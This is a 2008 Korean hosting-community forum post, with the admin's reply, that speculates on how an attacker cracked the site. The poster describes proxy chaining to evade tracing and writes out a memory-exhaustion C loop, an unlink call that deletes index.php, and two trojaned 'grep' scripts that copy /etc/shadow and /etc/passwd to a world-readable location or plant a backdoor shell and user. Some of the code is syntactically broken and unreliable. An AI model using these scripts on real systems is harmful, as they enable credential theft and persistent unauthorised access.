1. 자유게시판
  2. 기술지원
  3. 홈피 자랑
  4. FAQ



한국레드햇 너나우리 DNSEver qmail.kldp.org 어드민플레이

여기에서 디지문호스팅에 대한 호불호를 논하셔도 좋고 일상 다반사에 관한 이야기를 올리셔도 좋습니다. 정치/종교적 색채가 너무 짙거나 광고/스팸성 게시물만 제외하곤 모두 환영합니다.

인도네시아짓이 아닌듯.... 미국쪽이나 그런것같네여

서버를 여러개 경유하면 추적이 안되는걸로 알고 있어요...

예를들어

해커가 있고 A란 컴터가 있고, B란 컴터도 있습니다. 그리고 또 목표 컴퓨터(서버)가 있습니다.

대충 Telnet으로 A를 경유하고 A에서 telnet명령을 써서 B에 접속을 하고 B에서 Telnet을 써서 목표컴터에 침투하면

사실상 B컴퓨터의 IP가 로그에 남죠.

만약 원격접속(윈도 자체에 있음)으로 A에 들어가서 또 거기서 원격접속으로 B에들어가서 목표컴터에 웹 크랙을 하면 그래도 B컴터 아이피가 남습니다.

제로보드 4를 크랙해서 백도어를 심을수 있었던건.... 아무래도....

제로보드의 파일(lib.php등등)이 패치가 안된것같다는 의심이 드네여....

글구... php로된 인덱스를 파괴한 크랙 스크립트는 밑에 꺼랑 비슷할거라 생각드네요.

제로보드가 '/홈페이지 전체경로/zb4/'이면 [unlink("../index.php")]가 쓰여있었을겁니다.

제가 .... 한번해본적이 있어서 ㅎㅎ(...)

그리고... 메모리를 과다하게 넘치게 만드는 소스는 ... malloc만 쓸줄 알면 된다는 ㅋ

#include <malloc.h>
#include <stdio.h>
int main()
{
char buf[];
for(;;)
{
buf=malloc(10000000) /* 10000kb(10MB)씩 점유시켜서 흘러넘치게 만든다 */
}
}

포멧이 진행된 코드는 ..... 저도 모르겟네여 ㅡㅡ;

그리구 명령어를 조작하는 방법은.....

grep을 실행하니 sigtax error가뜨셧다고 하셨는데여....

그건 아마도.... /usr/sbin/에 가짜 파일을 넣은듯 하네여....

grep이란 파일에 이런 스크립트로 채워져있었을수도 ;;;

cp /bin/bash /tmp/bashx
cd /tmp
chmod 777 bashx               <-- 누구나 사용가능하게 함.
adduser hakc                       <-- 사용자 추가 (레드햇 계열에선 adduser, useradd인 경우도 있음)
chuser bashx -u hakc         <-- 이게 맞는지 모르겟음....  ( 소유자 바꿈 )
cd /root/
echo sigtax error

이렇게 되어있었거나....

cp /etc/passwd /tmp/pw
cp /etc/shadow /tmp/shadow
cd /tmp
chmod 777 pw
chmod 777 shadow
cd /root/
echo sigtax error

이런식으로 암호파일이나 쉐도파일이나 루트 쉘(백도어)을 따내려던 수작이었을수도...

근데... 파티션이 날아 갔다니.... 이런거( 위에 보여준 2개 스크립트 ) 맹글어놓은 사람.... 허탈하겟군요 ㅎㅎㅡㅡ;

조회 수 :
3124
등록일 :
2008.02.02
19:33:21 (*.216.74.41)
엮인글 :
http://hosting.digimoon.net/board/5571/b06/trackback
게시글 주소 :
http://hosting.digimoon.net/board/5571

[레벨:15]id: 디지문디지문

2008.02.02
19:48:17
(*.168.0.254)

프락시를 경유한 사실이란 것 쯤은 알고 있었습니다. 똑같은 계정에 10개 정도 되는 IP로 공격이 들어오고 있었으니까요. 프락시를 수시로 바꾸어 가며 만행을 시도한 것 같네요.
제로보드4는 최신 버전으로 패치가 이미 다 되어 있는 상태인데도 뚫고 들어오네요.
제로보드4 체제로 계속 나가려면 뚫릴 가능성에서 완전 해방되긴 힘들 듯 싶습니다. 수시로 모니터링하며 접근 시도가 들어오면 해당 IP를 차단하는 걸로 대응하는 수 밖에 없을 것 같네요. 트립와이어, mod_security와 같은 무료 솔루션을 최대한 활용하고 있습니다. 
파티션 날릴 수 있던 건 아마도 마스터부트레코드에 스크립트를 심어서 그런 것 같네요.  

List of Articles
번호 제목 글쓴이 날짜 조회 수
132 어느 분이 osos 0.1 에서 버그 찾아주셧는데.. [레벨:5]국민석 2008-02-24 2094
131 Digix 접속불능입니다. [3] [레벨:2]감자칩한봉지 2008-02-24 2744
130 허허허허허허허허 [8] [레벨:3]재훈군 2008-02-23 2527
129 ^^ [2] [레벨:0]동용이 2008-02-17 2528
128 리눅스 보안 취약점 발견? [레벨:1]느시 2008-02-14 2585
127 후- 배치고사 끝.. [1] [레벨:5]국민석 2008-02-12 2593
126 하하하하하하...... 바이러스.... [레벨:3]재훈군 2008-02-09 1911
125 제 블로그 말입니다.. [2] [레벨:5]국민석 2008-02-09 2607
124 옛 ...... 맨손.................................. [4] [레벨:3]재훈군 2008-02-08 2069
123 디지문호스팅말입니다..... [3] imagefile [레벨:3]재훈군 2008-02-08 3048
122 모두들 보세요 [1] [레벨:3]재훈군 2008-02-08 2050
121 계정 비밀번호 변경 요청합니다. secret [레벨:1]느시 2008-02-07 16
120 으허엏ㅇㅎ 엏 엏ㅇㅎㅇ허 ㅇㅎ ㅠㅠ [1] [레벨:0]말랑이 2008-02-06 2668
119 기부 기부~~ [3] secret [레벨:0]쫑이 2008-02-03 24
» 인도네시아에서 날아온 크래킹에 관해 [1] [레벨:3]재훈군 2008-02-02 3124
117 으음 -_- [2] [레벨:5]국민석 2008-02-01 2529
116 깜박한건데요 [3] [레벨:5]국민석 2008-01-31 2718
115 음... 이건 접속 안 되는 것과는 또 다른 문제네요.... [1] [레벨:1]eyeball 2008-01-31 2499
114 디지문 호스팅 입주자 모임좀 만들어봣습니다 [5] [레벨:5]국민석 2008-01-30 2662
113 디지문 님 [2] secret [레벨:0]주경민 2008-01-28 23
112 앞으론.. ㅠㅠ [2] [레벨:5]국민석 2008-01-28 2603
111 혹시 서버 업다운그레이드 후에 500 에러 나시는분? [1] [레벨:1]느시 2008-01-27 2741
110 캬하하하 네이버 ㅋ [1] imagefile [레벨:3]재훈군 2008-01-25 2511
109 여긴 내가 접수했습니다 크하하 [레벨:5]국민석 2008-01-21 2317
108 q-koros 첫버전 공개가 늦는이유 [레벨:5]국민석 2008-01-21 2471
107 지금은 몰컴중~~ [1] [레벨:5]국민석 2008-01-21 2626
106 하드디스크 관련 질문 ㅡㅡ; [2] [레벨:3]재훈군 2008-01-20 2348
105 국민석님 축하해염 ㅋ ! [2] imagefile [레벨:3]재훈군 2008-01-20 2970
104 이거 올려되 될련지.... [1] file [레벨:3]재훈군 2008-01-20 3038
103 진짜 오랜만에 접속하네요 [3] [레벨:3]재훈군 2008-01-20 2317